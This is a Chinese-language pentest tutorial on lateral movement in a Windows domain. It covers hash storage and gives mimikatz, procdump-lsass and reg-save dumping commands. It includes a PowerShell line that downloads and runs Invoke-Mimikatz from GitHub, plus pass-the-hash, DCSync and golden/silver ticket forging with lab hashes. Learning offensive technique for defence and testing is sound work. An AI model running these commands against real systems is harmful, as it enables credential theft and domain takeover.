內網滲透之域內橫向移動

hash 介紹

全在域環境中，用戶信息存儲在域控的ntds.dit（C:\Windows\NTDS\NTDS.dit）中；

非域環境也就是在工作組環境中，當前主機用戶的密碼信息存儲著在sam文件（C:\Windows\System32\config\SAM）。

Windows操作系統通常使用兩種方法（LM和NTLM）對用戶的明文密碼進行加密處理。

LM只能存儲小于等于14個字符的密碼hash

如果密碼大于14個，windows就自動使用NTLM對其進行加密。

LM Hash的全名為”LAN Manager Hash”，是微軟為了提高Windows操作系統的安全性而采用的散列值加密算法，XP、win2k和win2k3來說

系統默認使用LM進行加密，個人版從Windows Vista 以后，服務器版從Windows Server 2003以后該方法被禁用。

如果抓取的LM Hash值是”aad3b435b51404eeaad3b435b51404ee”

可能的情況有：LM Hash值為空、密碼大于14位、被禁用或者認為設置。

NTLM Hash是微軟為了在提高安全性的同時保證兼容性而設計的散列加密算法。

NTLM Hash是基于MD4加密算法進行加密的。

Windows操作系統的認證方式均為NTLM Hash。

hash 獲取

要在windows系統中抓取nt-hash或者明文，必須要system權限

想要破解sam文件與ntds.dit文件都需要擁有一個system文件

(C:\Windows\System32\config\SYSTEM)

離線獲取

導出 sam 和 system 文件

reg save hklm\system  C:\Users\Administrator\Desktop\hash\system.hive
reg save hklm\sam C:\Users\Administrator\Desktop\hash\sam.hive

使用 mimikatz

lsadump::sam /sam:C:\Users\Administrator\Desktop\hash\sam.hive /system:C:\Users\Administrator\Desktop\hash\system.hive

mimikatz

本地讀取

將 mimikatz 傳到目標機器

privilege::debugtoken::elevatelsadump::sam

在線讀取

mimikatz.exe privilege::debug sekurlsa::logonpasswords

lsass.dmp

使用 procdump 導出 了lsass.dmp 文件

procdump.exe -accepteula -ma lsass.exe C:\Users\Administrator\Desktop\hash\lsass.dmp
sekurlsa::minidump C:\Users\Administrator\Desktop\hash\lsass.dmp
sekurlsa::logonpasswords full

powershell

遠程獲取

powershell "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/mattifestation/PowerSploit/master/Exfiltration/Invoke-Mimikatz.ps1'); Invoke-Mimikatz -DumpCreds"

hash 傳遞（pth,pass the hash）

測試環境

域：tisheng.test

用戶名：administrator

NTLM hash:3ec403e7aee6461f12e8f7b644410605

用管理員權限運行

mimikatz.exe "privilege::debug" "sekurlsa::pth /user:administrator /domain:tisheng.test /ntlm:3ec403e7aee6461f12e8f7b644410605"

成功后回彈出一個新的窗口

票據傳遞（ptt,path the triket）

票據傳遞攻擊（PtT）是一種使用Kerberos票據代替明文密碼或NTLM哈希的方法。

PtT最常見的用途可能是使用黃金票據和白銀票據，通過PtT訪問主機相當簡單。

黃金票據(tgt,Golden Ticket)

金票是通過偽造的TGT（TicketGranting Ticket），金票就有了域內的最高權限。

制作金票的條件

1、域名稱            
2、域的SID值
3、域的KRBTGT賬戶密碼HASH (krbtgt 域賬戶的密碼基本不會更改，即使域管密碼被修改，它也不會改變)
4、偽造用戶名，可以是任意的

獲取數據

mimikatz.exe "log" "privilege::debug" "lsadump::dcsync /domain:tisheng.test /user:krbtgt"

生成金票

方法1：

生成金票

kerberos::golden /admin:administrator /domain:0day.org /sid:S-1-5-21-1812960810-2335050734-3517558805 /krbtgt:36f9d9e6d98ecf8307baf4f46ef842a2 /ticket:golden.kiribi

將金票導入內存

kerberos::purge                  //清空內存中的票據kerberos::ppt golden.kiribi        //導入票據kerberos::list                    //查看票據

方法2：

kerberos::golden /user:要偽造的域用戶(我們這一般寫域管理員) /domain:域名 /sid:域的sid值 /krbtgt:krbtgt的哈希 /pttkerberos::golden /user:administrator /domain:tisheng.test /sid:S-1-5-21-74797282-3442809439-2700332097/krbtgt:070dac97f50c95d08e98be1578327e7b /ptt

也可以使用 ase256 生成

kerberos::golden /user:administrator /domain:tisheng.test /sid:S-1-5-21-74797282-3442809439-2700332097-502 /aes256:9dd45bd4b2c39a54240f5dc03bb4ecfb023285cf956425ba16f61db7ee48040d  /ptt

方法3：

在域控上執行

mimikatz.exe "privilege::debug" "sekurlsa::tickets /export"

將生成的文件保存下來

mimikatz "privilege::debug"  "kerberos::ptt [0;b9476]-2-0-40e10000-Administrator@krbtgt-TISHENG.TEST.kirbi"

白銀票據（st,SilverTickets）

銀票只能訪問指定服務

制作銀票的條件

1.域名稱2.域的SID值3.域中的Server服務器賬戶的NTLM-Hash4.偽造的用戶名，可以是任意用戶名.5.目標服務器上面的kerberos服務
服務名稱                    同時需要的服務WMI                        HOST、RPCSSPowerShell Remoting        HOST、HTTPWinRM                    HOST、HTTPScheduled Tasks            HOSTWindows File Share        CIFSLDAP                    LDAPWindows Remote Server    RPCSS、LDAP、CIFS

生成白銀票據

kerberos::golden /domain:tisheng.test /sid:S-1-5-21-74797282-3442809439-2700332097 /target:dc.tisheng.test /service:cifs /rc4:3ec403e7aee6461f12e8f7b644410605 /user:test /ptt